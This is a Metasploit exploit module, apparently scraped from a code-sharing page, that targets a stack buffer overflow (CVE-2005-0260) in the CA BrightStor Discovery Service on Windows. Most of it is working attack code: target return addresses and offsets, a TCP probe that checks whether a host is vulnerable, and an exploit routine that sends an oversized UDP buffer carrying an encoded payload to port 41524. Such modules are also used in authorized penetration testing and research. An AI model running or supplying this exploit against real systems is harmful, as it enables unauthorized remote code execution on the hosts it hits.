Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::Tcp
10
  include Msf::Exploit::Remote::Udp
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'CA BrightStor Discovery Service Stack Buffer Overflow',
15
      'Description'    => %q{
16
          This module exploits a vulnerability in the CA BrightStor
17
        Discovery Service. This vulnerability occurs when a large
18
        request is sent to UDP port 41524, triggering a stack buffer
19
        overflow.
20
      },
21
      'Author'         => [ 'hdm', 'aushack' ],
22
      'License'        => MSF_LICENSE,
23
      'References'     =>
24
        [
25
          [ 'CVE', '2005-0260'],
26
          [ 'OSVDB', '13613'],
27
          [ 'BID', '12491'],
28
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'],
29
        ],
30
      'Privileged'     => true,
31
      'Payload'        =>
32
        {
33
          'Space'    => 2048,
34
          'BadChars' => "\x00",
35
          'StackAdjustment' => -3500,
36
        },
37
      'Platform'      => %w{ win },
38
      'Targets'        =>
39
        [
40
          [
41
            'cheyprod.dll 12/12/2003',
42
            {
43
              'Platform' => 'win',
44
              'Ret'      => 0x23808eb0, # call to edi reg
45
              'Offset'   => 968,
46
            },
47
          ],
48
          [
49
            'cheyprod.dll 07/21/2004',
50
            {
51
              'Platform' => 'win',
52
              'Ret'      => 0x2380a908, # call edi
53
              'Offset'   => 970,
54
            },
55
          ],
56
        ],
57
      'DisclosureDate' => '2004-12-20',
58
      'DefaultTarget' => 0))
59

60
    register_options(
61
      [
62
        Opt::RPORT(41524)
63
      ])
64
  end
65

66
  def check
67

68
    # The first request should have no reply
69
    csock = Rex::Socket::Tcp.create(
70
      'PeerHost'  => datastore['RHOST'],
71
      'PeerPort'  => 41523,
72
      'Context'   =>
73
        {
74
          'Msf'        => framework,
75
          'MsfExploit' => self,
76
        })
77

78
    csock.put('META')
79
    x = csock.get_once(-1, 3)
80
    csock.close
81

82
    # The second request should be replied with the host name
83
    csock = Rex::Socket::Tcp.create(
84
      'PeerHost'  => datastore['RHOST'],
85
      'PeerPort'  => 41523,
86
      'Context'   =>
87
        {
88
          'Msf'        => framework,
89
          'MsfExploit' => self,
90
        })
91

92
    csock.put('hMETA')
93
    y = csock.get_once(-1, 3)
94
    csock.close
95

96
    if (y and not x)
97
      return Exploit::CheckCode::Detected
98
    end
99
    return Exploit::CheckCode::Safe
100
  end
101

102
  def exploit
103
    connect_udp
104

105
    print_status("Trying target #{target.name}...")
106

107
    buf = rand_text_english(4096)
108

109
    # Target 0:
110
    #
111
    # esp @ 971
112
    # ret @ 968
113
    # edi @ 1046
114
    # end = 4092
115

116
    buf[target['Offset'], 4] = [ target.ret ].pack('V')
117
    buf[1046, payload.encoded.length] = payload.encoded
118

119
    udp_sock.put(buf)
120
    udp_sock.recvfrom(8192)
121

122
    handler
123
    disconnect_udp
124
  end
125
end
126

127